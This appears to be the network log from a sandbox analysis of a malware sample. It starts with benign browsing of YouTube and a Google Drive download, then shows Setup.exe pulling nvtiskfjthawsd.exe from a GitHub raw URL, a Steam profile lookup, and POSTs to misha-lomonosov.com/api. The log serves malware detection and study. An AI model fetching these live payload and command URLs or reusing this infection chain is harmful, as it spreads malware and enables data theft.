                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/scheduler.vflset/scheduler.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.7hiJwkXlKs8.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywGGJrddI2OdqQpm3Rz8uCoVK9lqTQ

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/spf.vflset/spf.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/network.vflset/network.js
                                  • 216.58.201.118:443
                                    i.ytimg.com
                                    tls, http2
                                    chrome.exe
                                    1.0kB
                                    6.0kB
                                    9
                                    8
                                  • 216.58.201.118:443
                                    https://i.ytimg.com/vi/t3g84irdNns/hqdefault.jpg?sqp=-oaymwEmCKgBEF5IWvKriqkDGQgBFQAAiEIYAdgBAeIBCggYEAIYBjgBQAE=&rs=AOn4CLDQgAZ7K00oK0sIDPZ_EyRHoEiu3w
                                    tls, http2
                                    chrome.exe
                                    3.3kB
                                    33.4kB
                                    35
                                    35

                                    HTTP Request

                                    GET https://i.ytimg.com/generate_204

                                    HTTP Request

                                    GET https://i.ytimg.com/vi/uL_USmYHfsA/hqdefault.jpg

                                    HTTP Response

                                    200

                                    HTTP Request

                                    GET https://i.ytimg.com/vi/t3g84irdNns/hqdefault.jpg?sqp=-oaymwEmCKgBEF5IWvKriqkDGQgBFQAAiEIYAdgBAeIBCggYEAIYBjgBQAE=&rs=AOn4CLDQgAZ7K00oK0sIDPZ_EyRHoEiu3w
                                  • 74.125.100.39:443
                                    https://rr2---sn-5hnekn7s.googlevideo.com/generate_204
                                    tls, http
                                    chrome.exe
                                    4.1kB
                                    6.1kB
                                    17
                                    11

                                    HTTP Request

                                    GET https://rr2---sn-5hnekn7s.googlevideo.com/generate_204?conn2

                                    HTTP Response

                                    204

                                    HTTP Request

                                    GET https://rr2---sn-5hnekn7s.googlevideo.com/generate_204

                                    HTTP Response

                                    204
                                  • 74.125.100.39:443
                                    https://rr2---sn-5hnekn7s.googlevideo.com/generate_204?conn2
                                    tls, http
                                    chrome.exe
                                    4.1kB
                                    6.1kB
                                    17
                                    11

                                    HTTP Request

                                    GET https://rr2---sn-5hnekn7s.googlevideo.com/generate_204

                                    HTTP Response

                                    204

                                    HTTP Request

                                    GET https://rr2---sn-5hnekn7s.googlevideo.com/generate_204?conn2

                                    HTTP Response

                                    204
                                  • 142.250.178.10:443
                                    https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSGQmKxNxjKKzyPhIFDfGjW-MhXnk0F9E-J64SGQk8yq_jFOmFmxIFDfGjW-MhXnk0F9E-J64=?alt=proto
                                    tls, http2
                                    chrome.exe
                                    4.0kB
                                    53.7kB
                                    43
                                    59

                                    HTTP Request

                                    OPTIONS https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

                                    HTTP Request

                                    POST https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

                                    HTTP Request

                                    GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTIzLjAuNjMxMi4xMjMSGQmKxNxjKKzyPhIFDfGjW-MhXnk0F9E-J64SGQk8yq_jFOmFmxIFDfGjW-MhXnk0F9E-J64=?alt=proto
                                  • 142.251.173.84:443
                                    accounts.google.com
                                    tls, http2
                                    chrome.exe
                                    1.5kB
                                    1.6kB
                                    9
                                    6
                                  • 142.250.179.238:443
                                    https://play.google.com/log?format=json&hasfast=true&authuser=0
                                    tls, http2
                                    chrome.exe
                                    2.2kB
                                    8.6kB
                                    21
                                    20

                                    HTTP Request

                                    OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0

                                    HTTP Request

                                    OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
                                  • 142.251.173.84:443
                                    https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=AVdkyDnXAHShuldcgFRleM05CGzqH6Rt8JMm1qf1WXxeRJxASq1ufAnjCkAKtbwnMLRoBGOMOSiHpw&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1625554358%3A1736720354892087&ddm=1
                                    tls, http2
                                    chrome.exe
                                    3.5kB
                                    12.8kB
                                    26
                                    27

                                    HTTP Request

                                    GET https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en

                                    HTTP Request

                                    GET https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&passive=true&service=youtube&uilel=3&ifkv=AVdkyDkCXvSG36u0zpyERvRHHL7P4FmUijcMgFjapO3HyeW4t0o4SWThLoqq7gwODOSwGX9JbUMVnw

                                    HTTP Request

                                    GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=AVdkyDnXAHShuldcgFRleM05CGzqH6Rt8JMm1qf1WXxeRJxASq1ufAnjCkAKtbwnMLRoBGOMOSiHpw&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1625554358%3A1736720354892087&ddm=1
                                  • 142.250.187.196:443
                                    https://www.google.com/js/th/WuArCo6uiOC32QOIiNWeSH9h2H5vf_jv_ihZ0ZQebSo.js
                                    tls, http2
                                    chrome.exe
                                    2.8kB
                                    28.5kB
                                    32
                                    29

                                    HTTP Request

                                    GET https://www.google.com/js/th/WuArCo6uiOC32QOIiNWeSH9h2H5vf_jv_ihZ0ZQebSo.js
                                  • 172.217.16.225:443
                                    yt3.ggpht.com
                                    tls, http2
                                    chrome.exe
                                    1.6kB
                                    1.6kB
                                    10
                                    6
                                  • 172.217.16.225:443
                                    https://yt3.ggpht.com/xOmpjq6EEO00oKM7AdDSnsTzc6AbOOnvbVQVA2hbtfADkg11rbojiT6rJUNuCP1gDsAhm3fp=s88-c-k-c0x00ffffff-no-rj
                                    tls, http2
                                    chrome.exe
                                    3.9kB
                                    22.5kB
                                    35
                                    35

                                    HTTP Request

                                    GET https://yt3.ggpht.com/xOmpjq6EEO00oKM7AdDSnsTzc6AbOOnvbVQVA2hbtfADkg11rbojiT6rJUNuCP1gDsAhm3fp=s48-c-k-c0x00ffffff-no-rj

                                    HTTP Request

                                    GET https://yt3.ggpht.com/a/default-user=s48-c-k-c0x00ffffff-no-rj

                                    HTTP Request

                                    GET https://yt3.ggpht.com/ytc/AIdro_kV2rSsga_TIsj5RGl3LPHQZ2ClGSzyTWeeJiREiSu2NuE=s88-c-k-c0x00ffffff-no-rj

                                    HTTP Request

                                    GET https://yt3.ggpht.com/xOmpjq6EEO00oKM7AdDSnsTzc6AbOOnvbVQVA2hbtfADkg11rbojiT6rJUNuCP1gDsAhm3fp=s88-c-k-c0x00ffffff-no-rj
                                  • 216.58.213.14:443
                                    https://youtube.com/
                                    tls, http2
                                    chrome.exe
                                    2.9kB
                                    10.5kB
                                    25
                                    25

                                    HTTP Request

                                    GET https://youtube.com/

                                    HTTP Request

                                    GET https://youtube.com/
                                  • 142.250.187.230:443
                                    static.doubleclick.net
                                    tls
                                    chrome.exe
                                    1.3kB
                                    8.1kB
                                    12
                                    11
                                  • 142.250.187.230:443
                                    https://static.doubleclick.net/instream/ad_status.js
                                    tls, http2
                                    chrome.exe
                                    2.3kB
                                    6.7kB
                                    19
                                    15

                                    HTTP Request

                                    GET https://static.doubleclick.net/instream/ad_status.js
                                  • 216.58.201.98:443
                                    https://googleads.g.doubleclick.net/pagead/id?slf_rd=1
                                    tls, http2
                                    chrome.exe
                                    2.7kB
                                    7.4kB
                                    22
                                    19

                                    HTTP Request

                                    GET https://googleads.g.doubleclick.net/pagead/id

                                    HTTP Request

                                    GET https://googleads.g.doubleclick.net/pagead/id?slf_rd=1
                                  • 172.217.169.78:443
                                    https://drive.google.com/drivesharing/clientmodel?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&foreignService=texmex&authuser=0&origin=https%3A%2F%2Fdrive.google.com
                                    tls, http2
                                    chrome.exe
                                    4.0kB
                                    39.9kB
                                    38
                                    50

                                    HTTP Request

                                    GET https://drive.google.com/file/d/1h8JICIA-04JL-lbd-QjlgqIibo65-pWv/view?usp=sharing

                                    HTTP Request

                                    GET https://drive.google.com/auth_warmup

                                    HTTP Request

                                    GET https://drive.google.com/drivesharing/clientmodel?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&foreignService=texmex&authuser=0&origin=https%3A%2F%2Fdrive.google.com
                                  • 142.250.178.14:443
                                    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_1
                                    tls, http2
                                    chrome.exe
                                    6.0kB
                                    122.8kB
                                    93
                                    98

                                    HTTP Request

                                    GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0

                                    HTTP Request

                                    GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_1
                                  • 142.250.178.14:443
                                    apis.google.com
                                    chrome.exe
                                    98 B
                                    52 B
                                    2
                                    1
                                  • 142.250.179.238:443
                                    https://play.google.com/log?format=json&hasfast=true
                                    tls, http2
                                    chrome.exe
                                    14.5kB
                                    9.9kB
                                    33
                                    33

                                    HTTP Request

                                    POST https://play.google.com/log?format=json&hasfast=true

                                    HTTP Request

                                    POST https://play.google.com/log?format=json&hasfast=true
                                  • 142.250.200.3:443
                                    https://ssl.gstatic.com/docs/doclist/images/mediatype/icon_2_archive_x16.png
                                    tls, http2
                                    chrome.exe
                                    2.9kB
                                    19.4kB
                                    32
                                    31

                                    HTTP Request

                                    GET https://ssl.gstatic.com/docs/common/cleardot.gif?zx=dtsxs6oy4flb

                                    HTTP Request

                                    GET https://ssl.gstatic.com/docs/common/viewer/v3/v-sprite62.svg

                                    HTTP Request

                                    GET https://ssl.gstatic.com/docs/doclist/images/mediatype/icon_2_archive_x16.png
                                  • 142.251.173.84:443
                                    https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdrive.google.com%2Fdrivesharing%2Fclientmodel%3Fid%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps%3A%2F%2Fdrive.google.com&followup=https%3A%2F%2Fdrive.google.com%2Fdrivesharing%2Fclientmodel%3Fid%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps%3A%2F%2Fdrive.google.com&ifkv=AVdkyDmbFBvOnivf3JKgdvaJHjX-vQRsw15vVblPbQ2Jwxojz1NmnflZi7hxkMzDV9PMLP9NVfJMaw&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1679321021%3A1736720401588527&ddm=1
                                    tls, http2
                                    chrome.exe
                                    4.1kB
                                    12.6kB
                                    26
                                    27

                                    HTTP Request

                                    GET https://accounts.google.com/ServiceLogin?passive=1209600&osid=1&continue=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&followup=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com

                                    HTTP Request

                                    GET https://accounts.google.com/InteractiveLogin?continue=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&followup=https://drive.google.com/drivesharing/clientmodel?id%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps://drive.google.com&osid=1&passive=1209600&ifkv=AVdkyDnPrIwI-kcKd2ZIma2rg6AB0jptYpYfgRxymlpty1oMQQsMxzMao1DkvUCvd7j0BJJETKIA9w

                                    HTTP Request

                                    GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdrive.google.com%2Fdrivesharing%2Fclientmodel%3Fid%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps%3A%2F%2Fdrive.google.com&followup=https%3A%2F%2Fdrive.google.com%2Fdrivesharing%2Fclientmodel%3Fid%3D1h8JICIA-04JL-lbd-QjlgqIibo65-pWv%26foreignService%3Dtexmex%26authuser%3D0%26origin%3Dhttps%3A%2F%2Fdrive.google.com&ifkv=AVdkyDmbFBvOnivf3JKgdvaJHjX-vQRsw15vVblPbQ2Jwxojz1NmnflZi7hxkMzDV9PMLP9NVfJMaw&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1679321021%3A1736720401588527&ddm=1
                                  • 142.250.187.202:443
                                    https://content.googleapis.com/drive/v2beta/files/1h8JICIA-04JL-lbd-QjlgqIibo65-pWv?fields=alternateLink%2CcopyRequiresWriterPermission%2CcreatedDate%2Cdescription%2CdriveId%2CfileSize%2CiconLink%2Cid%2Clabels(starred%2C%20trashed)%2ClastViewedByMeDate%2CmodifiedDate%2Cshared%2CteamDriveId%2CabuseNoticeReason%2CrestrictionVisualizationCallouts%2ClabelInfo%2CuserPermission(id%2Cname%2CemailAddress%2Cdomain%2Crole%2CadditionalRoles%2CphotoLink%2Ctype%2CwithLink)%2Cpermissions(id%2Cname%2CemailAddress%2Cdomain%2Crole%2CadditionalRoles%2CphotoLink%2Ctype%2CwithLink)%2Cparents(id)%2Ccapabilities(canMoveItemWithinDrive%2CcanMoveItemOutOfDrive%2CcanMoveItemOutOfTeamDrive%2CcanAddChildren%2CcanDownload%2CcanComment%2CcanEdit%2CcanInitiateEsignature%2CcanMoveChildrenWithinDrive%2CcanMoveItemIntoTeamDrive%2CcanRename%2CcanRemoveChildren)%2Ckind&supportsTeamDrives=true&includeBadgedLabels=true&enforceSingleParent=true&key=AIzaSyC1eQ1xj69IdTMeii5r7brs3R90eck-m7k
                                    tls, http2
                                    chrome.exe
                                    3.8kB
                                    8.4kB
                                    21
                                    22

                                    HTTP Request

                                    GET https://content.googleapis.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.gapi.en.l2ZUC8FxqV8.O%2Fd%3D1%2Frs%3DAHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ%2Fm%3D__features__

                                    HTTP Request

                                    GET https://content.googleapis.com/drive/v2beta/files/1h8JICIA-04JL-lbd-QjlgqIibo65-pWv?fields=alternateLink%2CcopyRequiresWriterPermission%2CcreatedDate%2Cdescription%2CdriveId%2CfileSize%2CiconLink%2Cid%2Clabels(starred%2C%20trashed)%2ClastViewedByMeDate%2CmodifiedDate%2Cshared%2CteamDriveId%2CabuseNoticeReason%2CrestrictionVisualizationCallouts%2ClabelInfo%2CuserPermission(id%2Cname%2CemailAddress%2Cdomain%2Crole%2CadditionalRoles%2CphotoLink%2Ctype%2CwithLink)%2Cpermissions(id%2Cname%2CemailAddress%2Cdomain%2Crole%2CadditionalRoles%2CphotoLink%2Ctype%2CwithLink)%2Cparents(id)%2Ccapabilities(canMoveItemWithinDrive%2CcanMoveItemOutOfDrive%2CcanMoveItemOutOfTeamDrive%2CcanAddChildren%2CcanDownload%2CcanComment%2CcanEdit%2CcanInitiateEsignature%2CcanMoveChildrenWithinDrive%2CcanMoveItemIntoTeamDrive%2CcanRename%2CcanRemoveChildren)%2Ckind&supportsTeamDrives=true&includeBadgedLabels=true&enforceSingleParent=true&key=AIzaSyC1eQ1xj69IdTMeii5r7brs3R90eck-m7k
                                  • 142.250.200.10:443
                                    https://blobcomments-pa.clients6.google.com/v1/metadata?docId=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&revisionId=0B0VkZ3O2boEdQVduNXorWjZSNGdpZitaRXN2UTJSeVZjRVNnPQ&userLocale=en-GB&timeZoneId=Etc%2FGMT&documentResourceKey.resourceKey&forceImportEnabled=true&key=AIzaSyCMp6sr4oTC18AWkE2Ii4UBZHTHEpGZWZM&%24unique=gc797
                                    tls, http2
                                    chrome.exe
                                    3.2kB
                                    13.9kB
                                    23
                                    25

                                    HTTP Request

                                    OPTIONS https://blobcomments-pa.clients6.google.com/v1/metadata?docId=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&revisionId=0B0VkZ3O2boEdQVduNXorWjZSNGdpZitaRXN2UTJSeVZjRVNnPQ&userLocale=en-GB&timeZoneId=Etc%2FGMT&documentResourceKey.resourceKey&forceImportEnabled=true&key=AIzaSyCMp6sr4oTC18AWkE2Ii4UBZHTHEpGZWZM&%24unique=gc797

                                    HTTP Request

                                    GET https://blobcomments-pa.clients6.google.com/v1/metadata?docId=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&revisionId=0B0VkZ3O2boEdQVduNXorWjZSNGdpZitaRXN2UTJSeVZjRVNnPQ&userLocale=en-GB&timeZoneId=Etc%2FGMT&documentResourceKey.resourceKey&forceImportEnabled=true&key=AIzaSyCMp6sr4oTC18AWkE2Ii4UBZHTHEpGZWZM&%24unique=gc797
                                  • 142.250.178.14:443
                                    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0?le=scs
                                    tls, http2
                                    chrome.exe
                                    3.0kB
                                    40.2kB
                                    33
                                    42

                                    HTTP Request

                                    GET https://apis.google.com/js/googleapis.proxy.js?onload=startup

                                    HTTP Request

                                    GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0?le=scs
                                  • 142.250.187.196:443
                                    https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
                                    tls, http2
                                    chrome.exe
                                    2.5kB
                                    9.7kB
                                    20
                                    18

                                    HTTP Request

                                    GET https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
                                  • 142.250.180.10:443
                                    peoplestackwebexperiments-pa.clients6.google.com
                                    tls, http2
                                    chrome.exe
                                    1.1kB
                                    11.3kB
                                    11
                                    12
                                  • 142.250.180.10:443
                                    https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags
                                    tls, http2
                                    chrome.exe
                                    3.5kB
                                    14.2kB
                                    32
                                    35

                                    HTTP Request

                                    OPTIONS https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags

                                    HTTP Request

                                    OPTIONS https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags

                                    HTTP Request

                                    POST https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags

                                    HTTP Request

                                    POST https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags
                                  • 216.58.212.193:443
                                    drive.usercontent.google.com
                                    tls, http2
                                    chrome.exe
                                    1.0kB
                                    5.9kB
                                    9
                                    8
                                  • 216.58.212.193:443
                                    https://drive.usercontent.google.com/download?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&export=download
                                    tls, http2
                                    chrome.exe
                                    3.1kB
                                    11.1kB
                                    23
                                    24

                                    HTTP Request

                                    GET https://drive.usercontent.google.com/uc?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&export=download

                                    HTTP Request

                                    GET https://drive.usercontent.google.com/download?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&export=download
                                  • 142.250.200.3:443
                                    https://ssl.gstatic.com/docs/doclist/images/drive_2022q3_32dp.png
                                    tls, http2
                                    chrome.exe
                                    2.0kB
                                    8.1kB
                                    19
                                    14

                                    HTTP Request

                                    GET https://ssl.gstatic.com/docs/doclist/images/drive_2022q3_32dp.png
                                  • 74.125.206.94:443
                                    https://beacons.gcp.gvt2.com/domainreliability/upload
                                    tls, http2
                                    chrome.exe
                                    5.1kB
                                    6.8kB
                                    25
                                    19

                                    HTTP Request

                                    POST https://beacons.gcp.gvt2.com/domainreliability/upload

                                    HTTP Request

                                    POST https://beacons.gcp.gvt2.com/domainreliability/upload
                                  • 74.125.206.94:443
                                    beacons.gcp.gvt2.com
                                    tls, http2
                                    chrome.exe
                                    1.1kB
                                    5.6kB
                                    9
                                    8
                                  • 74.125.206.94:443
                                    https://beacons.gcp.gvt2.com/domainreliability/upload
                                    tls, http2
                                    chrome.exe
                                    2.4kB
                                    6.6kB
                                    19
                                    15

                                    HTTP Request

                                    POST https://beacons.gcp.gvt2.com/domainreliability/upload
                                  • 142.251.173.84:443
                                    accounts.google.com
                                    tls, http2
                                    chrome.exe
                                    1.2kB
                                    5.6kB
                                    12
                                    8
                                  • 142.250.179.238:443
                                    https://play.google.com/log?format=json&hasfast=true&authuser=0
                                    tls, http2
                                    chrome.exe
                                    2.1kB
                                    8.4kB
                                    20
                                    17

                                    HTTP Request

                                    OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
                                  • 20.26.156.215:443
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    1.6kB
                                    10.0kB
                                    17
                                    14

                                    HTTP Request

                                    GET https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    302
                                  • 185.199.111.133:443
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    27.3kB
                                    1.3MB
                                    552
                                    959

                                    HTTP Request

                                    GET https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    200
                                  • 20.26.156.215:443
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    1.3kB
                                    8.6kB
                                    15
                                    12

                                    HTTP Request

                                    GET https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    302
                                  • 20.26.156.215:443
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    1.2kB
                                    11.2kB
                                    15
                                    13

                                    HTTP Request

                                    GET https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    302
                                  • 185.199.111.133:443
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    36.6kB
                                    1.3MB
                                    686
                                    969

                                    HTTP Request

                                    GET https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    200
                                  • 185.199.111.133:443
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    28.4kB
                                    1.3MB
                                    564
                                    963

                                    HTTP Request

                                    GET https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    200
                                  • 20.26.156.215:443
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    957 B
                                    7.8kB
                                    12
                                    10

                                    HTTP Request

                                    GET https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    302
                                  • 185.199.111.133:443
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    27.9kB
                                    1.3MB
                                    575
                                    961

                                    HTTP Request

                                    GET https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    200
                                  • 23.67.133.187:443
                                    https://steamcommunity.com/profiles/76561199724331900
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.5kB
                                    43.1kB
                                    21
                                    36

                                    HTTP Request

                                    GET https://steamcommunity.com/profiles/76561199724331900

                                    HTTP Response

                                    200
                                  • 23.67.133.187:443
                                    https://steamcommunity.com/profiles/76561199724331900
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.5kB
                                    43.1kB
                                    21
                                    36

                                    HTTP Request

                                    GET https://steamcommunity.com/profiles/76561199724331900

                                    HTTP Response

                                    200
                                  • 23.67.133.187:443
                                    https://steamcommunity.com/profiles/76561199724331900
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.5kB
                                    43.1kB
                                    21
                                    36

                                    HTTP Request

                                    GET https://steamcommunity.com/profiles/76561199724331900

                                    HTTP Response

                                    200
                                  • 104.21.14.233:443
                                    https://misha-lomonosov.com/api
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.0kB
                                    4.9kB
                                    9
                                    9

                                    HTTP Request

                                    POST https://misha-lomonosov.com/api

                                    HTTP Response

                                    200
                                  • 104.21.14.233:443
                                    https://misha-lomonosov.com/api
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.0kB
                                    4.9kB
                                    9
                                    9

                                    HTTP Request

                                    POST https://misha-lomonosov.com/api

                                    HTTP Response

                                    200
                                  • 23.67.133.187:443
                                    https://steamcommunity.com/profiles/76561199724331900
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.5kB
                                    43.1kB
                                    21
                                    36

                                    HTTP Request

                                    GET https://steamcommunity.com/profiles/76561199724331900

                                    HTTP Response

                                    200
                                  • 104.21.14.233:443
                                    https://misha-lomonosov.com/api
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.0kB
                                    4.9kB
                                    9
                                    9

                                    HTTP Request

                                    POST https://misha-lomonosov.com/api

                                    HTTP Response

                                    200
                                  • 104.21.14.233:443
                                    https://misha-lomonosov.com/api
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.1kB
                                    4.9kB
                                    10
                                    9

                                    HTTP Request

                                    POST https://misha-lomonosov.com/api

                                    HTTP Response

                                    200
                                  • 20.26.156.215:443
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    905 B
                                    7.8kB
                                    11
                                    10

                                    HTTP Request

                                    GET https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    302
                                  • 185.199.111.133:443
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    25.6kB
                                    1.3MB
                                    535
                                    965

                                    HTTP Request

                                    GET https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe

                                    HTTP Response

                                    200
                                  • 23.67.133.187:443
                                    https://steamcommunity.com/profiles/76561199724331900
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.5kB
                                    43.1kB
                                    21
                                    36

                                    HTTP Request

                                    GET https://steamcommunity.com/profiles/76561199724331900

                                    HTTP Response

                                    200
                                  • 104.21.14.233:443
                                    https://misha-lomonosov.com/api
                                    tls, http
                                    nvtiskfjthawsd.exe
                                    1.0kB
                                    4.9kB
                                    9
                                    9

                                    HTTP Request

                                    POST https://misha-lomonosov.com/api

                                    HTTP Response

                                    200
                                  • 20.26.156.215:443
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    tls, http
                                    Setup.exe
                                    905 B
                                    7.8kB
                                    11
                                    10

                                    HTTP Request

